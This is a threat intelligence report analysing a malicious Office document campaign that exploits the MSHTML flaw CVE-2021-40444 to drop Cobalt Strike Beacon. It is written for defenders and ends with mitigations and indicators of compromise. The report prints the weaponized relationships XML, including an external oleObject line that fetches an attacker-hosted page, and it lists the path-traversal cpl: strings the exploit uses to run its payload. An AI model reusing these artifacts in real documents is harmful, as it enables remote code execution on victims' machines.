Overview
MSHTML (Microsoft HTML) engine, aka Trident, is a browser engine developed by Microsoft for Internet Explorer. The Microsoft Office suite supports MSHTML, which is being abused by threat actors to gain code execution on targeted systems. Attackers craft a malicious ActiveX control, which is then abused by a Microsoft Office document that hosts the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logical flaw in MSHTML. These malicious documents are delivered via Office 365. By default, the documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user continues to download the content bypassing the mitigation measures, the target machine will be exploited, and malware agents such as CobaltStrike Beacon are deployed. Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning note that reads: “Suspicious Cpl File Execution.” Based on the quality of the vulnerability research and scale at which users are being targeted, it is most likely that an advanced adversary is responsible for the ongoing campaign. CloudSEK Threat Intelligence Research team has obtained malicious artifacts to retrieve the TTPs (Tactics, Techniques, and Procedures) used by the adversaries that leverage the MSHTML RCE bug to provide better security for our clients. This report provides the technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain as a large number of systems continue to be susceptible.Remote Template Injection Technique
Microsoft Word/ Excel documents are an archived collection of XML files that retain the information and data provided by the user while creating the document on corresponding Office applications. In simple words, one can easily unzip the doc files to see internal XML files that contain various metadata. The directory “word\_rels” in unzipped Word/ Excel files plays a very significant role in weaponizing a seemingly benign document.<?xml version="1.0" encoding="UTF-8" standalone="true"?> -<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/> <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/> <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/> <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/> <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/> <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/> <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/> <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/> </Relationships> |
Exploitation
The malicious webpage ‘side.html’ fetched by the document contains a heavily obfuscated JavaScript code that exploits the CVE-2021-40444 vulnerability that has no official patch at the time of writing this report. Execution of this phase leads to retrieval of the final payload for command and control.Cobalt Strike Beacon
A basic image analysis shows that the ‘champion.inf' file is, in fact, a 64-bit DLL (Dynamic Link Library) and its first bytes text is “MZ.” The CPL file is a control panel item that has code execution capabilities. A DLL becomes CPL when it exports a particular function called ‘CplApplet', which can be readily executed like a PE (Portable Executable).Dynamic Analysis of the Exploit
When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed as a result of the code execution is a Cobalt Strike beacon as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found few interesting results that are shared below.Loading of Vulnerable Module
Microsoft Word application loads mshtml.dll from Windows Directory. The vulnerability resides in one of the functionalities defined in the DLL files.File Writing
Final payload championship.inf is extracted from the initial ministry.cab archive file and is written to the Temp directory. This is probably caused by the vulnerability which is abused by adversaries to write user-controlled data on the file disk.Code Execution
CloudSEK researchers also identified multiple control.exe processes that are spawned to execute the given CPL payload. Each of these processes search for the champion.inf file in directories that are hardcoded in the exploit. Here’s a list of the hardcoded directories to which the payload is dropped.cpl:../../../AppData/Local/Temp/Low/championship.inf |
.cpl:../../../AppData/Local/Temp/championship.inf |
cpl:../../../../AppData/Local/Temp/Low/championship.inf |
cpl:../../../../AppData/Local/Temp/championship.inf |
.cpl:../../../../../Temp/Low/championship.inf |
.cpl:../../../../../Temp/championship.inf |
.cpl:../../Low/championship.inf |
.cpl:../../championship.inf |
Guidelines
Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:- Disable ActiveX via Group Policy*
- Disable ActiveX on individual systems via registry
- Disable shell preview in Windows Explorer
- Enterprise customers who manage updates should select the detection build 1.349.22.0
Indicators of Compromise (IOCs)
Sha-256 | D0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745 |
049ed15ef970bd12ce662cffa59f7d0e0b360d47fac556ac3d36f2788a2bc5a4 | |
5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185 | |
199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455 | |
3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf | |
D0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6 | |
938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 | |
URLs | hxxp://hidusi[.]com/e8c76295a5f9acb7/side[.]html |
hxxp://hidusi[.]com/e8c76295a5f9acb7/ministry[.]cab | |
hxxps://joxinu[.]com | |
hxxps://joxinu[.]com/hr[.]html | |
hxxps://dodefoh[.]com | |
hxxps://dodefoh[.]com/ml[.]html | |
hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html | |
hxxp://sagoge[.]com/ | |
hxxps://comecal[.]com/ | |
hxxps://rexagi[.]com/ | |
hxxp://sagoge[.]com/get_load | |
hxxps://comecal[.]com/static-directory/templates[.]gif | |
hxxps://comecal[.]com/ml[.]js?restart=false | |
hxxps://comecal[.]com/avatars | |
hxxps://rexagi[.]com:443/avatars | |
hxxps://rexagi[.]com/ml[.]js?restart=false | |
hxxps://macuwuf[.]com | |
hxxps://macuwuf[.]com/get_load |